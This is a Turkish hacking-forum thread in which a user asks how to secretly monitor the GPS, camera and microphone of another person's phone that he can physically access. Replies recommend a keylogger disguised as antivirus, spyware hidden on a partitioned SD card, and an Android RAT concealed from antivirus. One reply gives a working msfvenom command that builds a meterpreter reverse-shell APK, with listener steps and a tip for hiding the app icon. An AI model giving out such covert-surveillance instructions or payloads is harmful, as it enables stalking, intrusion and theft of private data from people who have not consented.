birinin telefonuna sızmak istiyorum

Rawest

Yeni üye
13 Kas 2022
34
5
Merhaba ben genellikle termux kullaniyorum ama sanal makinemde kali kullaniyorum şimdi fiziksel olarak erişebildiğim bir telefinun gps,kamera,seslerini dinlemek görmek istiyorum mümkünmüdür nasıl bir program bir tool varmı ve dediğim gibi fiziksel erişimim olan bjr cihaza yaoabilirmiyim

Yusuf Walker

Katılımcı Üye
1 Ocak 2019
673
425
Trabzon
Merhaba ben genellikle termux kullaniyorum ama sanal makinemde kali kullaniyorum şimdi fiziksel olarak erişebildiğim bir telefinun gps,kamera,seslerini dinlemek görmek istiyorum mümkünmüdür nasıl bir program bir tool varmı ve dediğim gibi fiziksel erişimim olan bjr cihaza yaoabilirmiyim
Telefona fiziksel erişimin var ise işte anti virüs vs diyip keylogger indirebilirsin, bu şekilde takip mümkün olabilir, fakat çok büyük suçtur.

00000000000000

Yeni üye
6 Ocak 2023
13
7
Sadece usb bellek programla ve yardımcı aparat ile telefona tak, bu yöntem mükemmeldir. Bilgisayarda olduğu gibi boot tarzı kurulum gerçekleştirebilir yada otomatik kurulum gerçekleştirebilirsin. İkinci yöntemde yazılımdan geçiyor, sd kart programla karşı taraf telefonu bıraktığı zaman 10 saniyede takarsın ve telefonu olduğu gibi bırakırsın. İnan farkına bile varmaz, sd kartı bellek parçalarına bölersin bilgisayarda olduğu gibi 100mb alanı ayırırsın 3900mb kullanım alanı bırakırsın 100mb içinde ise senin yazılım kalır. Fark edene kadar +4gb alanın telefonun hafızası zanneder o sırada istediğini alırsın. Bunları tavsiye etmem sadece bilgi amaçlı ama zaten bunun için usta olmak gerek youtube'da videolar çok. :)

./Laedrix.sh

Yeni üye
29 Ocak 2023
6
0
msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost IP LPORT=LocalPort R > android.apk at kendi cihazına msfconsole>use expoit/multi/handler>set payload android/meterpreter/reverse_tcp>set lport <localport>>set lhost <localhost>>run && exploit diyerek dinlemeye alabilirsin.Eğer icon gizlemek istersen kendi içerisinde komutu barındırıyor.Eğer çalışmassa da youtube da ingilizce olarak aratırsan bir ton video var Ana Aktivite üzerine yazarak da halledebilirsin.

K4RDAN4DAM

Uzman üye
22 Mar 2015
1,675
5
YOK
Sana lazım olan andro rat turevleri. androidde calısan bır rat bul. bu ratı antıvıruse karsı gızlemen gerekır. telefona yedır. sonra izle, takip. bıraz arastır hazır lokmacıları sevmem :)

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.